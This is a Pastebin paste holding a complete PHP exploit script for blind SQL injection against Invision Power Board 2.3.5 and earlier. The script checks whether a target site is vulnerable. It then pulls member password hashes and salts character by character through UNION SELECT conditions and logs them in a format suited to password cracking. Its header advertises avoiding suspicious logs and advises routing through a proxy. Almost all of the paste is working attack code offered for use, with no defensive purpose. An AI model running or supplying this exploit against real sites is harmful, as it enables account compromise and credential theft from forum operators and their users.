Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(E_ALL);
- ///////////////////////////////////////////////////////////////////////
- ///////////////////////////////////////////////////////////////////////
- // IPB <= 2.3.5 sql injection exploit
- // Version 1.3
- // written by Wareaxe
- // Modded by Affix
- // http://Root-The.NET
- // based on DarkFig's advisory
- // http://acid-root.new.fr/?0:18
- //
- // FEATURES:
- // 1. Fetching algorithm optimized for speed
- // 2. Attack goes through $_POST, so no suspicious logs
- // 3. Command Line Argument Interface
- // 4. Select from and to User IDs
- // 5. Pretesting saves time if IPB is not vulnerable
- // 6. curl extension autoloading
- // 7. can work with multiple ID-s
- // 8. log format compatible with passwordspro
- ///////////////////////////////////////////////////////////////////////
- //================================================== ===================
- print("RTN IPB <= 2.3.5 Blind SQL Injection Tool \n");
- print("Coded by Waraxe Modded by Affix \n");
- if(!isset($_SERVER['argv'][1]))
- {
- die("\n\nUsage php -f " . $_SERVER['argv'][0] . " http://site.com/ <start> <end> <prefix>\n\n");
- }
- $url = $_SERVER['argv'][1];
- if(!isset($_SERVER['argv'][2]))
- {
- print("Start and End ID Not Set using 1 and 10 as DEFAULT");
- $id_start = 1;// starting user ID, default value "1" is admin's ID
- if(!isset($_SERVER['argv'][3])){
- $id_end = $id_start + 10;// ending user ID
- }
- }
- else
- {
- $id_start = $_SERVER['argv'][2];
- $id_end = $_SERVER['argv'][3];
- }
- if(!isset($_SERVER['argv'][4]))
- {
- print("Prefix not set reverting to default (ibf_)\n");
- $prefix = 'ibf_';// IPB table prefix, default is "ibf_"
- }
- else
- {
- $prefix = $_SERVER['argv'][4];
- }
- # Proxy settings
- # Be sure to use proxy
- //$proxy_ip_port = '127.0.0.1:8118';
- //$proxy_user_password = 'someuseromepassword';
- $outfile = './ipblog.txt';// Log file
- //================================================== ====================
- ///////////////////////////////////////////////////////////////////////
- // Don't mess below this line, unless you know the stuff
- ///////////////////////////////////////////////////////////////////////
- //================================================== ===================
- ///////////////////////////////////////////////////////////////////////
- //================================================== ===================
- $cli = php_sapi_name() === 'cli';
- //================================================== ===================
- // Warning, if executed from webserver
- //================================================== ===================
- if(!$cli)
- {
- if(!isset($_REQUEST['wtf-is-cli']))
- {
- echo "<html><head><title>Attention!</title></head>\n";
- echo "<body><br /><br /><center>\n";
- echo "<h1>Warning!</h1>\n";
- echo "This exploit is meant to be used as php CLI script!<br />\n";
- echo "More information:<br />\n";
- echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
- echo "Still, you can try to run it from webserver.<br />\n";
- echo "Just press the button below and prepare for long waiting<br />\n";
- echo "And learn to use php CLI next time, please ...<br />\n";
- echo "<form method=\"get\">\n";
- echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
- echo "</form>\n";
- echo "</center></body></html>\n";
- exit;
- }
- else
- {
- // Let's try to maximize our chances without CLI
- @set_time_limit(0);
- }
- }
- //================================================== ===================
- xecho("Target: $url\n");
- xecho("Sql table prefix: $prefix\n");
- xecho("Testing target URL ... \n");
- test_target_url();
- xecho("Target URL seems to be valid\n");
- add_line("Target: $url");
- for($i = $id_start; $i <= $id_end; $i ++)
- {
- echo "Testing ID $i\n";
- if(!test_target_id($i))
- {
- echo "ID $i not valid, passing ...\n";
- continue;
- }
- echo "ID $i validated\n";
- $hash = get_hash($i);
- $salt = get_salt($i);
- $line = "$i:$hash:$salt";
- add_line($line);
- xecho("\n------------------------------------------\n");
- xecho("User ID: $i\n");
- xecho("Hash: $hash\n");
- xecho("Salt: $salt");
- xecho("\n------------------------------------------\n");
- }
- add_line("------------------------------------------");
- xecho("\nQuestions and feedback - http://www.waraxe.us/ ~ http://belegit.org \n");
- die("See ya! \n");
- //////////////////////////////////////////////////////////////////////
- //////////////////////////////////////////////////////////////////////
- function test_target_url()
- {
- global $url;
- $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
- $buff = trim(make_post($url, $post, '', $url));
- if($buff === 'notfound')
- {
- die("Target is patched? Exiting ...\n");
- }
- if($buff !== 'found')
- {
- print("Invalid response, target URL not valid? Exiting ... \n\n");
- die();
- }
- }
- //////////////////////////////////////////////////////////////////////
- function test_target_id($id)
- {
- global $url, $prefix;
- $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
- return test_condition($post);
- }
- ///////////////////////////////////////////////////////////////////////
- function get_salt($id)
- {
- $len = 5;
- $out = '';
- xecho("Finding salt ...\n");
- for($i = 1; $i < $len + 1; $i ++)
- {
- $ch = get_saltchar($i, $id);
- xecho("Got pos $i --> $ch\n");
- $out .= "$ch";
- xecho("Current salt: $out \n");
- }
- xecho("\nFinal salt for ID $id: $out\n\n");
- return $out;
- }
- ///////////////////////////////////////////////////////////////////////
- function get_saltchar($pos, $id)
- {
- global $prefix;
- $char = '';
- $min = 32;
- $max = 128;
- $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
- $curr = 0;
- while(1)
- {
- $area = $max - $min;
- if($area < 2 )
- {
- $post = $pattern . "=$max";
- $eq = test_condition($post);
- if($eq)
- {
- $char = chr($max);
- }
- else
- {
- $char = chr($min);
- }
- break;
- }
- $half = intval(floor($area / 2));
- $curr = $min + $half;
- $post = $pattern . '%253e' . $curr;
- $bigger = test_condition($post);
- if($bigger)
- {
- $min = $curr;
- }
- else
- {
- $max = $curr;
- }
- xecho("Current test: $curr-$max-$min\n");
- }
- return $char;
- }
- ///////////////////////////////////////////////////////////////////////
- function get_hash($id)
- {
- $len = 32;
- $out = '';
- xecho("Finding hash ...\n");
- for($i = 1; $i < $len + 1; $i ++)
- {
- $ch = get_hashchar($i, $id);
- xecho("Got pos $i --> $ch\n");
- $out .= "$ch";
- xecho("Current hash: $out \n");
- }
- xecho("\nFinal hash for ID $id: $out\n\n");
- return $out;
- }
- ///////////////////////////////////////////////////////////////////////
- function get_hashchar($pos, $id)
- {
- global $prefix;
- $char = '';
- $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
- // First let's determine, if it's number or letter
- $post = $pattern . '%253e57';
- $letter = test_condition($post);
- if($letter)
- {
- $min = 97;
- $max = 102;
- xecho("Char to find is [a-f]\n");
- }
- else
- {
- $min = 48;
- $max = 57;
- xecho("Char to find is [0-9]\n");
- }
- $curr = 0;
- while(1)
- {
- $area = $max - $min;
- if($area < 2 )
- {
- $post = $pattern . "=$max";
- $eq = test_condition($post);
- if($eq)
- {
- $char = chr($max);
- }
- else
- {
- $char = chr($min);
- }
- break;
- }
- $half = intval(floor($area / 2));
- $curr = $min + $half;
- $post = $pattern . '%253e' . $curr;
- $bigger = test_condition($post);
- if($bigger)
- {
- $min = $curr;
- }
- else
- {
- $max = $curr;
- }
- xecho("Current test: $curr-$max-$min\n");
- }
- return $char;
- }
- ///////////////////////////////////////////////////////////////////////
- function test_condition($p)
- {
- global $url;
- $bret = false;
- $maxtry = 10;
- $try = 1;
- $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
- $post = sprintf($pattern, $p);
- while(1)
- {
- $buff = trim(make_post($url, $post, '', $url));
- if($buff === 'found')
- {
- $bret = true;
- break;
- }
- elseif($buff === 'notfound')
- {
- break;
- }
- elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
- {
- die("Sql error! Wrong prefix?\nExiting ... ");
- }
- else
- {
- xecho("test_condition() - try $try - invalid return value ...\n");
- $try ++;
- if($try > $maxtry)
- {
- die("Too many tries - exiting ...\n");
- }
- else
- {
- xecho("Trying again - try $try ...\n");
- }
- }
- }
- return $bret;
- }
- ///////////////////////////////////////////////////////////////////////
- function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
- {
- $ch = curl_init();
- $timeout = 120;
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1');
- if(!empty($GLOBALS['proxy_ip_port']))
- {
- curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
- if(!empty($GLOBALS['proxy_user_password']))
- {
- curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
- }
- }
- if(!empty($cookie))
- {
- curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
- }
- if(!empty($referer))
- {
- curl_setopt ($ch, CURLOPT_REFERER, $referer);
- }
- if($headers === TRUE)
- {
- curl_setopt ($ch, CURLOPT_HEADER, TRUE);
- }
- else
- {
- curl_setopt ($ch, CURLOPT_HEADER, FALSE);
- }
- $fc = curl_exec($ch);
- curl_close($ch);
- return $fc;
- }
- ///////////////////////////////////////////////////////////////////////
- function add_line($line)
- {
- global $outfile;
- $line .= "\n";
- $fh = fopen($outfile, 'ab');
- fwrite($fh, $line);
- fclose($fh);
- }
- ///////////////////////////////////////////////////////////////////////
- function xecho($line)
- {
- if($GLOBALS['cli'])
- {
- echo "$line";
- }
- else
- {
- $line = nl2br(htmlspecialchars($line));
- echo "$line";
- }
- }
- //////////////////////////////////////////////////////////////////////
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement